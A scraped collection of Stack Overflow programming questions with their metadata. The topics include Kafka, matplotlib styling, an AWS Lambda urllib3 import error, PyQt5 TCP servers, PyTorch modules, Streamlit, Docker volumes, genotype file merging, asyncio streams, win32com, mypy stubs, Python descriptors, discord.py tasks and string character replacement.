File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/client_async.py", line 687, in _poll
self._pending_completion.extend(conn.recv())
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/conn.py", line 1053, in recv
responses = self._recv()
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/conn.py", line 1127, in _recv
return self._protocol.receive_bytes(recvd_data)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/parser.py", line 132, in receive_bytes
resp = self._process_response(self._rbuffer)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/parser.py", line 138, in _process_response
recv_correlation_id = Int32.decode(read_buffer)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/types.py", line 64, in decode
return _unpack(cls._unpack, data.read(4))
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/types.py", line 23, in _unpack
raise ValueError("Error encountered when attempting to convert value: "
ValueError: Error encountered when attempting to convert value: b'' to struct format: '<built-in method unpack of _struct.Struct object at 0x10539a930>', hit error: unpack requires a buffer of 4 bytes
</code></pre>
|
<python><apache-kafka><kafka-consumer-api>
|
2023-05-22 07:02:23
| 1
| 6,100
|
Classified
|
76,303,651
| 4,420,797
|
Customize accuracy graph with lines and shapes
|
<p>I wrote a simple script to construct a graph and it works fine, but I have no idea how to modify it to look like the figure below. How can I customize the lines in matplotlib?</p>
<p><strong>Requirement:</strong></p>
<p><a href="https://i.sstatic.net/Wl9ix.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/Wl9ix.png" alt="enter image description here" /></a></p>
<p><strong>My Code</strong></p>
<pre><code>import matplotlib.pyplot as plt
# Data for different models and their corresponding accuracies
models = ['10', '60', '110', '160']
accuracies = [73.2, 75.6, 77.1, 78.3]
transmix_accuracies = [74.8, 76.4, 78.2, 79.1]
# Create a figure and axis object
fig, ax = plt.subplots()
# Plot the accuracy of ViT-based models
ax.plot(models, accuracies, marker='o', label='ViT')
# Plot the accuracy of TransMix models
ax.plot(models, transmix_accuracies, marker='o', label='TransMix')
# Set the chart title and axis labels
#ax.set_title("Improvement of TransMix on ViT-based Models")
ax.set_xlabel("Number of Parameters")
ax.set_ylabel("ImageNet Top-1 Acc (%)")
# Add a legend
ax.legend()
# Show the plot
plt.show()
</code></pre>
<p><strong>Output</strong></p>
<p><a href="https://i.sstatic.net/BPjBL.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/BPjBL.png" alt="enter image description here" /></a></p>
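<p>For reference, a hedged sketch of how such styling might be approached with standard matplotlib options: per-line <code>linestyle</code>/<code>marker</code>/<code>color</code> arguments plus per-point annotations. The specific colors, markers, and offsets here are guesses, not taken from the target figure:</p>
<pre><code>```python
import matplotlib
matplotlib.use("Agg")  # render off-screen so this runs headless
import matplotlib.pyplot as plt

models = ['10', '60', '110', '160']
accuracies = [73.2, 75.6, 77.1, 78.3]
transmix_accuracies = [74.8, 76.4, 78.2, 79.1]

fig, ax = plt.subplots()
# dashed grey baseline vs. solid highlighted line
ax.plot(models, accuracies, marker='s', linestyle='--', color='grey', label='ViT')
ax.plot(models, transmix_accuracies, marker='o', linestyle='-', color='tab:red', label='TransMix')
# annotate the improvement at each x position (index i maps to the i-th category)
for i, (y0, y1) in enumerate(zip(accuracies, transmix_accuracies)):
    ax.annotate(f'+{y1 - y0:.1f}', xy=(i, y1), xytext=(0, 6),
                textcoords='offset points', ha='center', fontsize=8)
ax.set_xlabel("Number of Parameters")
ax.set_ylabel("ImageNet Top-1 Acc (%)")
ax.legend()
fig.savefig("styled.png")
```</code></pre>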
|
<python><python-3.x><matplotlib>
|
2023-05-22 06:54:15
| 1
| 2,984
|
Khawar Islam
|
76,303,563
| 11,720,193
|
AWS Lambda import error: Unable to import module "lambda_function"
|
<p>I am trying to run a simple program in AWS Lambda. However, it is failing with a <code>DEFAULT_CIPHERS</code> error. When I run the following program it <strong>fails</strong> with the error <code>...unable to import lambda function</code>:</p>
<pre><code>import json
import boto3
import os
import requests
def lambda_handler(event, context):
file = '2011-02-12-0.json.gz'
download_res = requests.get(f"https://data.gharchive.org/{file}")
print(f"Files downloaded successfully - Filename: {file}")
os.environ.setdefault('AWS_PROFILE', 'myid')
s3 = boto3.client('s3')
upload_res = s3.put_object(Bucket='my-demo-bucket3', Key=file, Body=download_res.content)
print("Files Uploaded successfully")
return upload_res
</code></pre>
<p><strong>Error</strong>:</p>
<pre><code>Response
{
"errorMessage": "Unable to import module 'lambda_function': cannot import name 'DEFAULT_CIPHERS' from 'urllib3.util.ssl_' (/var/task/urllib3/util/ssl_.py)",
"errorType": "Runtime.ImportModuleError",
"requestId": "5d82baed-2ee6-41cd-a8e7-d24a59061dbc",
"stackTrace": []
}
</code></pre>
<p>Can anyone please help me sort this out? Thanks.</p>
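<p>For context, this import error is commonly reported when the deployment package contains urllib3 2.x, which removed the <code>DEFAULT_CIPHERS</code> symbol from <code>urllib3.util.ssl_</code>, while the botocore in the package still expects urllib3 1.x. A hedged workaround sketch is to pin urllib3 below 2 when building the package, e.g. in <code>requirements.txt</code>:</p>
<pre><code>```text
# requirements.txt (sketch): pin urllib3 so the removed
# DEFAULT_CIPHERS symbol is still present for botocore
boto3
requests
urllib3&lt;2
```</code></pre>
<p>After changing the pin, the dependencies have to be re-bundled and the Lambda redeployed for the fix to take effect.</p>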
|
<python><amazon-web-services><aws-lambda>
|
2023-05-22 06:39:33
| 1
| 895
|
marie20
|
76,303,520
| 1,780,761
|
PyQt5 - Move QTcpServer to subprocess
|
<p>I am trying to run a QTcpServer on a different thread, or even better in a subprocess, in Python using PyQt5.</p>
<p>Running it on a different QThread I get this error as soon as the server tries to send something to the client:</p>
<pre><code>QObject: Cannot create children for a parent that is in a different thread.
(Parent is QNativeSocketEngine(0x295023f7c50), parent's thread is QThread(0x29501ed7e30), current thread is QThread(0x2957feaffb0)
</code></pre>
<p>After some googling I found that I should not run a QTcpServer on a different thread, so I decided to run it as a separate subprocess: that way it has its own process where everything is initialized and <strong>should</strong> work, at least in my own theory. The server starts up alright and prints the message "listening for connections on port 2001", but I cannot connect with my client:</p>
<pre><code>Connecting to 127.0.0.1 ...
TCP connection error :10061
</code></pre>
<p>Any help is greatly appreciated...</p>
<p>here is my code:</p>
<p>main.py:</p>
<pre><code>import sys
import serverSub
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.uic import loadUi
class UiMainWindow(QMainWindow):
serverSp = serverSub.TcpSubprocess()
def __init__(self):
super(UiMainWindow, self).__init__()
self.serverSp.start_server()
self.show()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = UiMainWindow()
sys.exit(app.exec_())
</code></pre>
<p>serverSub.py:</p>
<pre><code>import subprocess
from PyQt5.QtCore import *
class TcpSubprocess(QObject):
# Start the server as a subprocess
p = subprocess.Popen
def start_server(self):
command = ['python', 'server2.py']
self.p = subprocess.Popen(command)
</code></pre>
<p>server2.py:</p>
<pre><code>import sys
from PyQt5.QtCore import *
from PyQt5.QtNetwork import QHostAddress, QTcpServer
class Server(QObject):
def __init__(self):
QObject.__init__(self)
self.TCP_LISTEN_TO_PORT = 2001
self.server = QTcpServer()
self.server.newConnection.connect(self.on_new_connection)
self.start_server()
self.socket = None
def __exit__(self, exc_type, exc_val, exc_tb):
print("server exited..")
def on_new_connection(self):
while self.server.hasPendingConnections():
self.set_socket(self.server.nextPendingConnection())
def start_server(self):
if self.server.listen(
QHostAddress.Any, self.TCP_LISTEN_TO_PORT
):
print("Server is listening on port: {}".format(self.TCP_LISTEN_TO_PORT))
else:
print("Server couldn't wake up")
def set_socket(self, socket):
self.socket = socket
self.socket.connected.connect(self.on_connected)
self.socket.disconnected.connect(self.on_disconnected)
self.socket.readyRead.connect(self.on_ready_read)
print("Client connected from Ip %s" % self.socket.peerAddress().toString())
def on_ready_read(self):
msg = self.socket.readAll()
msg_txt = str(msg, 'utf-8').strip()
messages = msg_txt.split("\r")
segments = messages[0].split(",")
if segments[0] == "STA":
status = int(segments[1])
# send back OK message
out = 'OK\r'
self.socket.write(bytearray(out, 'ascii'))
def on_connected(self):
print("Client connected")
def on_disconnected(self):
print("Client disconnected")
if __name__ == '__main__':
Server()
</code></pre>
|
<python><pyqt5><subprocess><qthread><qtcpserver>
|
2023-05-22 06:28:57
| 0
| 4,211
|
sharkyenergy
|
76,303,325
| 19,106,705
|
torch.nn.Parameter to nn.Module
|
<p>I want to replace the parameters inside a model with a custom nn.Module layer that I created. Below is a very simplified example of the code I desire.</p>
<p>Code:</p>
<pre class="lang-py prettyprint-override"><code>import torch
import torch.nn as nn
class change_to_layer(nn.Module):
def __init__(self):
super().__init__()
self.w = nn.Parameter(torch.randn(100, 100))
def __mul__(self, other):
return self.forward(other)
def __rmul__(self, other):
return self.forward(other)
def forward(self, x):
return x @ self.w
class simple_model(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(100, 100)
self.scale = nn.Parameter(torch.ones(1))
self.fc2 = nn.Linear(100, 100)
def forward(self, x):
x = self.fc1(x)
x = self.scale * x
x = self.fc2(x)
print(x)
model = simple_model()
model.scale = change_to_layer() # change nn.Parameter to nn.Module (error occurs)
input = torch.randn(100)
print(model(input))
</code></pre>
<p>However, I encounter the following error.</p>
<p>Error:</p>
<pre><code>---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-15-1a4295f999b1> in <cell line: 33>()
31 model = simple_model()
32
---> 33 model.scale = change_to_layer()
34
35 input = torch.randn(100)
/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py in __setattr__(self, name, value)
1633 elif params is not None and name in params:
1634 if value is not None:
-> 1635 raise TypeError("cannot assign '{}' as parameter '{}' "
1636 "(torch.nn.Parameter or None expected)"
1637 .format(torch.typename(value), name))
TypeError: cannot assign '__main__.change_to_layer' as parameter 'scale' (torch.nn.Parameter or None expected)
</code></pre>
<p>How can I change the type of a class variable?</p>
|
<python><pytorch>
|
2023-05-22 05:46:58
| 0
| 870
|
core_not_dumped
|
76,303,248
| 2,966,197
|
python streamlit sidebar resetting on entry of input
|
<p>I am creating a <code>streamlit</code> app where the sidebar first shows a file uploader and a button. Once the file is uploaded and the button is pressed, it shows more input options and two more buttons for the user to finally submit. At this second step, after the user enters an input, the sidebar resets back to step 1 and the previously revealed options become hidden again.</p>
<p>Here is my code:</p>
<pre><code> file = st.sidebar.file_uploader('Upload',type=["pdf","txt"])
#this is step1
if file is not None:
# Save uploaded file to 'F:/tmp' folder.
save_folder = 'F:/tmp'
save_path = Path(save_folder, file.name)
with open(save_path, mode='wb') as w:
        w.write(file.getvalue())  # the upload variable above is named 'file'
with st.sidebar:
if save_path.exists():
st.write("File uploaded")
co1, co2= st.sidebar.columns([1, 1])
submit = co1.button("Submit", use_container_width=True)
if submit:
input1, input2, input3 = compo() # local function which sets streamlit sidebar inputs
st.sidebar.markdown("---")
c1,c2 = st.sidebar.columns([1,1])
reset = c1.button("Reset", use_container_width=True)
fin_submit = c2.button("Final Submit", use_container_width=True)
#When I enter input1 and then go click to enter input2, it resets to step 1
if reset:
placeholder = st.empty()
if fin_submit:
if file is not None:
if (input1 == "Hello") or (input2 == "There"):
placeholder.empty()
# Call processng function and display result
else:
placeholder.empty()
st.error("Sorry!")
else:
if (input1 == "You") or (input2 == "there"):
placeholder.empty()
# Call processng function and display result
else:
placeholder.empty()
st.error("Sorry!")
</code></pre>
<p>Here is the code for <code>compo()</code>:</p>
<pre><code>def compo():
c1,c2 = st.sidebar.columns(2)
input1 = c1.selectbox(label = "Input 1",options = ['Hello',"You"])
input2 = c2.selectbox(label = "Input 2", options = ["There","there"])
input3 = st.sidebar.slider("Number",min_value=1, max_value=10, value=1, step=1)
    st.sidebar.markdown("---")
return input1, input2, input3
</code></pre>
<p>I don't know why, as soon as I enter a value in input1, it resets to step 1.</p>
|
<python><streamlit>
|
2023-05-22 05:28:04
| 1
| 3,003
|
user2966197
|
76,303,103
| 4,725,226
|
how to save a file outside the docker container with python
|
<p>So I have this structure:</p>
<p>myapp</p>
<ul>
<li>Dockerfile</li>
<li>main.py</li>
<li>req.txt</li>
</ul>
<p>this is the content of my Dockerfile:</p>
<pre><code>FROM python:3.8
ENV PYTHONDONTWRITEBYTECODE 1
ENV PYTHONUNBUFFERED 1
COPY . /app
WORKDIR /app
RUN pip3 install -r req.txt
RUN playwright install
RUN playwright install-deps
CMD ["python", "./main.py"]
</code></pre>
<p>and on my main.py, eventually, I have this code</p>
<pre><code> current_path = os.path.dirname(os.path.abspath(__file__))
result_path = os.path.join(current_path, 'result.json')
with open(result_path, 'w') as json_file:
json.dump(result, json_file, indent=4)
</code></pre>
<p>I can see that the script runs successfully, but I can't see the file that was supposed to be created in the same folder. I understand that the file is being created at</p>
<blockquote>
<p>/app/results.json</p>
</blockquote>
<p>but is there a way for this file to be created outside the container?</p>
<p>EDIT:
I have done my build with:</p>
<pre><code>docker build -t myapp .
</code></pre>
<p>and I run like this:</p>
<pre><code>docker run myapp
</code></pre>
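<p>For what it's worth, a common pattern (a sketch, with example paths of my choosing) is to bind-mount a host directory into the container so the JSON lands on the host:</p>
<pre><code>```shell
# bind-mount a host directory into the container (example paths)
docker build -t myapp .
docker run --rm -v "$(pwd)/out:/app/out" myapp
```</code></pre>
<p>This assumes the script is changed to write into <code>/app/out</code> (e.g. <code>result_path = os.path.join('/app/out', 'result.json')</code>); mounting a volume over <code>/app</code> itself would hide the code that was copied in at build time.</p>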
|
<python><docker><docker-volume>
|
2023-05-22 04:47:48
| 3
| 503
|
Raul Quinzani
|
76,303,026
| 3,449,555
|
create a union of 3 files with different column headers and rows
|
<p>I have three text files with different numbers of rows and columns. The column names differ between files. There are some overlapping rows and many unique rows.</p>
<p>file1.txt</p>
<pre><code>SNP CHROM POS ref alt GT info sample1 sample2 sample3 sample4 sample5
snp1 1 1 A c . PR 0/0 0/1 0/0 1/1 0/0
snp2 2 2 t a . PR 0/0 0/0 0/0 0/0 1/1
snp3 3 3 g t . PR 0/0 0/0 0/1 0/0 0/0
snp4 1 4 c g . PR 0/1 0/0 0/0 0/0 0/0
snp5 1 5 a c . PR 0/0 0/0 0/0 0/0 0/0
snp6 2 6 t a . PR 0/0 0/0 0/0 0/0 0/0
snp7 5 7 g t . PR 0/0 0/0 0/0 0/0 0/0
snp8 6 8 c g . PR 0/0 0/1 0/0 0/0 0/0
snp9 8 9 a c . PR 1/1 0/1 0/0 0/0 1/1
snp10 13 10 t a . PR 0/0 0/0 0/0 0/0 0/0
</code></pre>
<p>file2.txt</p>
<pre><code>SNP CHROM POS ref alt GT info sample6 sample7 sample8 sample9 sample10 sample11
snp1 1 1 A c . PR 0/0 0/1 0/0 1/1 0/0 0/0
snp2 2 2 t a . PR 0/0 0/0 0/0 0/0 1/1 1/1
snp4 3 3 g t . PR 0/1 0/0 0/0 0/0 0/0 0/0
snp5 1 4 c g . PR 0/0 0/0 0/0 0/0 0/0 0/0
snp7 1 5 a c . PR 0/0 0/0 0/0 0/0 0/0 0/0
snp8 2 6 t a . PR 0/0 0/1 0/0 0/0 0/0 0/0
snp10 5 7 g t . PR 0/0 0/0 0/0 0/0 0/0 0/0
snp11 6 8 c g . PR 1/1 0/1 0/0 0/0 1/1 1/1
snp12 8 9 a c . PR 1/1 0/1 0/0 0/0 1/1 1/1
snp13 13 10 t a . PR 1/1 0/1 0/0 0/0 1/1 1/1
</code></pre>
<p>file3.txt</p>
<pre><code>SNP CHROM POS ref alt GT info sample12 sample13 sample14 sample15 sample16 sample17 sample18 sample19
snp1 1 1 A c . PR 0/0 0/1 0/0 1/1 0/0 0/0 0/0 1/1
snp8 2 2 t a . PR 0/0 0/1 0/0 0/0 0/0 0/0 0/0 0/0
snp10 3 3 g t . PR 0/0 0/0 0/0 0/0 0/0 0/0 0/0 0/0
snp11 1 4 c g . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
snp12 1 5 a c . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
snp13 2 6 t a . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
snp14 5 7 g t . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
snp15 6 8 c g . PR 0/0 0/0 0/0 0/0 0/0 0/0 0/0 0/0
snp16 8 9 a c . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
snp17 13 10 t a . PR 0/0 0/0 0/0 0/0 0/0 0/0 0/0 0/0
snp18 11 11 g t . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
</code></pre>
<p>What I want to do is: take the union of all row names and the union of all column headers across the three files, then fill in the cell values from the files. For example, if a row is present in a file, enter the values for that file's columns; if a row is missing from a file, enter "./." for that file's columns, filling up the entire table based on the three files.
This is what I have tried so far in R:</p>
<pre><code>list(file1, file2, file3) %>%
reduce(full_join) %>%
mutate(across(everything(), replace_na, "./."))
</code></pre>
<p>However, since I have to join about 1,000 columns and about 22 million rows, I run into memory issues in R. Is there a time-efficient way to accomplish this in R, Python, or bash?</p>
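<p>A possible sketch (not tested at your scale): in Python/pandas the same reduce-with-full-join idea can be written as an outer merge on the shared annotation columns, filling the missing genotypes afterwards. The tiny inline strings below are stand-ins for the real files:</p>

```python
from functools import reduce
from io import StringIO

import pandas as pd

# Tiny stand-ins for file1/file2/file3; real code would use
# pd.read_csv(path, sep=r'\s+') on each file instead.
f1 = "SNP CHROM POS sample1\nsnp1 1 1 0/0\nsnp2 2 2 0/1\n"
f2 = "SNP CHROM POS sample2\nsnp1 1 1 1/1\nsnp3 3 3 0/0\n"

frames = [pd.read_csv(StringIO(t), sep=r'\s+') for t in (f1, f2)]

# Full outer join on the shared annotation columns, then fill the
# genotype calls that are missing for a given file with "./.".
shared = ['SNP', 'CHROM', 'POS']
merged = reduce(lambda a, b: a.merge(b, on=shared, how='outer'), frames)
sample_cols = [c for c in merged.columns if c not in shared]
merged[sample_cols] = merged[sample_cols].fillna('./.')
print(merged)
```

<p>For 22 million rows this still has to fit in memory, so for the full data a chunked or disk-backed approach (e.g. merging two files at a time and writing intermediate results) may be needed.</p>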
|
<python><r><merge>
|
2023-05-22 04:25:26
| 0
| 309
|
biobudhan
|
76,302,926
| 507,852
|
Python 3.11 - how to detect socket closed by peer when working with asyncio streams?
|
<p>I'm testing the TCP echo client example from the official Python 3.11 asyncio streams documentation. It works as expected, but it doesn't seem to detect when the socket is closed by the peer.</p>
<p>The client side code:</p>
<pre><code>import socket
import asyncio

async def echo_client(addr, port):
    r, w = await asyncio.open_connection(addr, port)

    # send data normally & receive the echoed-back string
    w.write("hello".encode())
    await w.drain()
    data = await r.read(100)
    print("received: {}".format(data))
    await asyncio.sleep(1)

    # tell the server side to close the socket connection
    w.write("exit".encode())
    await w.drain()
    await asyncio.sleep(1)

    # the underlying socket is already closed at this point, but
    # the stream won't react unless the following 2 lines are uncommented:
    # w.close()
    # await w.wait_closed()

    # write() only sends data to the kernel, OK I get that
    res = w.write("hello again".encode())
    print(f"write: {res}")
    # but why does drain() neither raise an exception nor return any error?
    res = await w.drain()
    print(f"drain: {res}")
    # read() returned immediately with 0 bytes read, as expected
    data = await r.read(100)
    print("received: {}".format(data))

asyncio.run(echo_client("127.0.0.1", 8000))
</code></pre>
<p>The server side simply echoes back what it receives from the connection, and closes the connection (without echoing back) if the received string starts with "<code>exit</code>". So in the code above, the connection is closed @line17.</p>
<p>The problem is: why do the following <code>write()</code> @line26, <code>drain()</code> @line29 and <code>read()</code> @line32 neither raise any exception nor return any error message?</p>
<p>The result is:</p>
<pre><code>received: b'hello'
write: None
drain: None
received: b''
</code></pre>
<p>It will only raise an exception if I uncomment <code>w.close()</code> and <code>w.wait_closed()</code>; only then does the stream know the socket is no longer available.</p>
<p>Yes, I'm aware that I'll never know whether the socket is good until I interact with it, and that <code>write()</code> simply hands data to the kernel buffer. But I didn't expect that even <code>drain()</code> would give no meaningful signal about the closed socket.</p>
<p>So the question is: how can I detect whether the underlying socket of Asyncio Streamer is closed by peer, other than checking the return value of <code>r.read()</code>?</p>
<p><strong>[EDIT]</strong></p>
<p>After some testing I've successfully made <code>read()</code> throw an exception, but the rule is quite weird. The minimal code to trigger the exception is:</p>
<pre><code>import asyncio

async def echo_client(addr, port):
    r, w = await asyncio.open_connection(addr, port)
    w.write("exit".encode())
    await w.drain()
    await asyncio.sleep(1)

    # socket is closed by peer at this point
    w.write(b'0')
    await asyncio.sleep(0.1)
    w.write(b'0')
    await asyncio.sleep(0.1)

    # will raise BrokenPipeError
    await r.read(100)

asyncio.run(echo_client("127.0.0.1", 8000))
</code></pre>
<p>The call to <code>read()</code> @line16 will finally raise <code>BrokenPipeError</code>, as it is supposed to. The point is:</p>
<ol>
<li>You <em>MUST</em> call <code>write()</code> at least twice after the socket is closed by the peer, and each call must write at least 1 byte of data, before asyncio finally realizes that this socket is no longer valid.</li>
<li>And you must give asyncio some time to process the system error message from the 1st <code>write()</code> call, and to mark the socket as broken after the 2nd <code>write()</code> call.</li>
<li>For some unknown reason, <code>write()</code> will never raise an exception; only <code>read()</code> and <code>drain()</code> do (the latter raising <code>ConnectionResetError</code>).</li>
</ol>
<p>I must say, this behavior is inconsistent and unsatisfying. It makes me rethink whether adopting the asyncio streams solution is a good idea. I guess I'd better stick to the low-level Transports & Protocols model if I keep using asyncio.</p>
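<p>For what it's worth, a hedged workaround sketch: treat an empty <code>read()</code> together with <code>at_eof()</code> as the close notification. The in-process echo server below is only a stand-in for the real peer:</p>

```python
import asyncio

async def main():
    async def handler(reader, writer):
        await reader.read(100)      # receive one message, then close
        writer.close()
        await writer.wait_closed()

    server = await asyncio.start_server(handler, '127.0.0.1', 0)
    port = server.sockets[0].getsockname()[1]

    r, w = await asyncio.open_connection('127.0.0.1', port)
    w.write(b'exit')
    await w.drain()

    data = await r.read(100)        # b'' means the peer closed
    peer_closed = data == b'' and r.at_eof()

    w.close()
    await w.wait_closed()
    server.close()
    await server.wait_closed()
    return peer_closed

print(asyncio.run(main()))
```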
|
<python><sockets><python-asyncio>
|
2023-05-22 03:46:55
| 1
| 1,982
|
RichardLiu
|
76,302,815
| 11,198,558
|
Issue when running win32com on Windows 11
|
<p>I'm now running Python on Windows 11 to read an Excel file protected with a password. The Python script is as below:</p>
<pre><code>import win32com.client

file_path = '<my_file_path>'
xlApp = win32com.client.Dispatch("Excel.Application")
xlwb = xlApp.Workbooks.Open(file_path, False, True, None, password)
</code></pre>
<p>and the Error is</p>
<pre><code> File "S:\GitHub\ncpt_database\main_src\src_code\readManualData.py", line 29, in readingEncryptedExcel
xlwb = xlApp.Workbooks.Open(file_path, False, True, None, password)
File "C:\Users\sonnm6\.conda\envs\bidv\lib\site-packages\win32com\client\dynamic.py", line 639, in __getattr__
raise AttributeError("%s.%s" % (self._username_, attr))
AttributeError: Excel.Application.Workbooks
</code></pre>
<p>I don't know how to solve this problem. I have tried removing the package and reinstalling it, but it still reproduces the error.</p>
<p>The error occurs with these package versions:</p>
<pre><code>Name Version Build Channel
pywin32 305 py39h2bbff1b_0 anaconda
pywin32-ctypes 0.2.0 py39haa95532_1000
</code></pre>
<p>Pls help!</p>
|
<python><win32com>
|
2023-05-22 03:06:26
| 1
| 981
|
ShanN
|
76,302,784
| 3,394,510
|
Trouble making mypy and phonenumbers module work, implementation missing
|
<p>I installed python's <a href="https://pypi.org/project/phonenumbers/" rel="nofollow noreferrer"><code>phonenumbers>=3.12.32</code></a>, which should include the stub files, but when I run <code>mypy</code> it yields:</p>
<pre><code>$ mypy -m module
module.py:22: error: Cannot find implementation or library stub for module named "phonenumbers"
module.py:22: note: See https://mypy.readthedocs.io/en/stable/running_mypy.html#missing-imports
</code></pre>
<hr />
<p>I suspect I'm not configuring mypy correctly, because when checking the <a href="https://github.com/daviddrysdale/python-phonenumbers/tree/dev/python/phonenumbers" rel="nofollow noreferrer">project, the <code>*.pyi</code> files are there</a>, and when checking the installed <code>phonenumbers</code> module in <code>venv/lib/python3.11/site-packages/phonenumbers</code>, I also see that the <code>*.pyi</code> files are present.</p>
<p>Any thoughts on how to make it work?</p>
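<p>If mypy was installed globally (e.g. via pipx) while <code>phonenumbers</code> lives in the project's virtualenv, mypy analyzes against the wrong interpreter. One possible fix sketch (the venv path is an assumption) is pointing mypy at the environment's interpreter in <code>mypy.ini</code>:</p>

```ini
; mypy.ini -- make mypy search the environment where phonenumbers
; (and its bundled *.pyi stubs) is actually installed
[mypy]
python_executable = venv/bin/python
```

<p>Alternatively, running <code>python -m mypy</code> from inside the activated venv avoids the mismatch entirely.</p>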
|
<python><mypy><python-typing>
|
2023-05-22 02:51:24
| 0
| 840
|
ekiim
|
76,302,654
| 2,326,961
|
Why does property override object.__getattribute__?
|
<p>I noticed that contrary to the <code>classmethod</code> and <code>staticmethod</code> decorators, the <code>property</code> decorator overrides the <code>object.__getattribute__</code> method:</p>
<pre class="lang-py prettyprint-override"><code>>>> list(vars(classmethod))
['__new__', '__repr__', '__get__', '__init__', '__func__', '__wrapped__', '__isabstractmethod__', '__dict__', '__doc__']
>>> list(vars(staticmethod))
['__new__', '__repr__', '__call__', '__get__', '__init__', '__func__', '__wrapped__', '__isabstractmethod__', '__dict__', '__doc__']
>>> list(vars(property))
['__new__', '__getattribute__', '__get__', '__set__', '__delete__', '__init__', 'getter', 'setter', 'deleter', '__set_name__', 'fget', 'fset', 'fdel', '__doc__', '__isabstractmethod__']
</code></pre>
<p>The functionality of the <code>property</code> decorator doesn’t seem to require this override (cf. the equivalent Python code in the <a href="https://docs.python.org/3/howto/descriptor.html#properties" rel="nofollow noreferrer">Descriptor HowTo Guide</a>). So which behaviour exactly does this override implement? Please provide a link to the corresponding C code in the <a href="https://github.com/python/cpython" rel="nofollow noreferrer">CPython repository</a>, and optionally an equivalent Python code.</p>
|
<python><python-descriptors>
|
2023-05-22 02:00:35
| 1
| 8,424
|
Géry Ogam
|
76,302,642
| 7,530,306
|
discord.py: sys:1: RuntimeWarning: coroutine 'Loop._loop' was never awaited
|
<pre><code>Traceback (most recent call last):
File "bot.py", line 55, in <module>
send_cal.start()
File "python3.8/site-packages/discord/ext/tasks/__init__.py", line 398, in start
self._task = asyncio.create_task(self._loop(*args, **kwargs))
File "/usr/local/Cellar/python@3.8/3.8.16/Frameworks/Python.framework/Versions/3.8/lib/python3.8/asyncio/tasks.py", line 381, in create_task
loop = events.get_running_loop()
RuntimeError: no running event loop
sys:1: RuntimeWarning: coroutine 'Loop._loop' was never awaited
</code></pre>
<p>I get the above traceback with this code for my bot</p>
<pre><code>@tasks.loop(seconds=20.0)
async def send_cal():
    message_channel = bot.get_channel(target_channel_id)
    print(f"Got channel {message_channel}")
    df = await someApi()
    df = df.drop(['stuff'], axis=1)
    csv = df.to_csv(header=False, index=False)
    res = csv.replace(',', ' ----> ')
    if (len(res)) >= 2000:
        await message.channel.send('result over 2000 chars')
    await message.channel.send(res)

@send_cal.before_loop
async def before():
    await client.wait_until_ready()
    print("Finished waiting")

send_cal.start()
client.run('mytoken')
</code></pre>
<p>I can't figure out why <code>send_cal</code> would never be awaited. I see the same setup in examples, where <code>.start()</code> kicks off the job, and I assume asyncio awaits it under the hood; however, I haven't been able to figure out why this is happening.</p>
<p>edit: I am really just copying the starter guide here <a href="https://discordpy.readthedocs.io/en/latest/ext/tasks/index.html" rel="nofollow noreferrer">https://discordpy.readthedocs.io/en/latest/ext/tasks/index.html</a></p>
|
<python><discord><python-asyncio>
|
2023-05-22 01:56:52
| 1
| 665
|
sf8193
|
76,302,550
| 1,469,208
|
Replace space with a random character (there and back) in Python
|
<h2>The problem</h2>
<p>I have a <em>haystack</em>:</p>
<pre><code>source = ''' "El Niño" "Hi there! How was class?"
"Me" "Good..."
"I can't bring myself to admit that it all went in one ear and out the other."
"But the part of the lesson about writing your own résumé was really interesting!"
"Me" "Are you going home now? Wanna walk back with me?"
"El Niño" "Sure!"'''
</code></pre>
<p>I have a <em>mask</em>:</p>
<pre><code>out_table = '→☺☻♥♦♣♠•◘○§¶▬↨↑↓←∟↔'
</code></pre>
<p>And I have a <em>token</em> -- <code> </code> (single space).</p>
<p>All their elements are <em>strings</em> (<code>class of <str></code>).</p>
<p>I need a function that will:</p>
<ol>
<li>Iterate through <em>haystack</em> (<code>source</code>)</li>
<li>Replace each occurrence of <em>token</em> (<code> </code>) with a <em>single character</em> <strong>randomly picked</strong> from the <em>mask</em></li>
<li>Will print resulting <em>new haystack</em> after the replacement process</li>
</ol>
<p>Finally, I need a similar method that will revert the above process, replacing each occurrence of every character from the <code>→☺☻♥♦♣♠•◘○§¶▬↨↑↓←∟↔</code> mask with <code> </code> (space).</p>
<h2>Expected result</h2>
<p>An example result (it can vary due to randomness) is (just a printout):</p>
<pre><code>↔◘↔▬"El→Niño"↓"Hi∟there!↓How↨was↨class?"
↔◘↔▬"Me"↓"Good..."
♥♦♣♠"I↓can't↨bring§myself↓to∟admit↓that↓it↓all↓went↓in↓one§ear↓and↓out§the↓other."
↔◘↔▬"But☻the☻part☻of↓the→lesson∟about↓writing↓own↓résumé§was§really→interesting!"
↔◘↔▬"Me"↓"Are↓you☻going↓home§now?→Wanna↓walk∟back↓with↓me?"
♥♦♣♠"El↓Niño"→"Sure!"
</code></pre>
<p>Assumptions:</p>
<ul>
<li><strong>Every</strong> space must be replaced in the <em>haystack</em></li>
<li><strong>Not every</strong> character out of <em>mask</em> must be used</li>
</ul>
<p>So, in the most extreme "random" scenario, <em>all</em> spaces will be replaced with <em>the same</em> character. That isn't a problem at all, as long as the whole process is reversible back to the original <em>haystack</em> (<code>source</code>).</p>
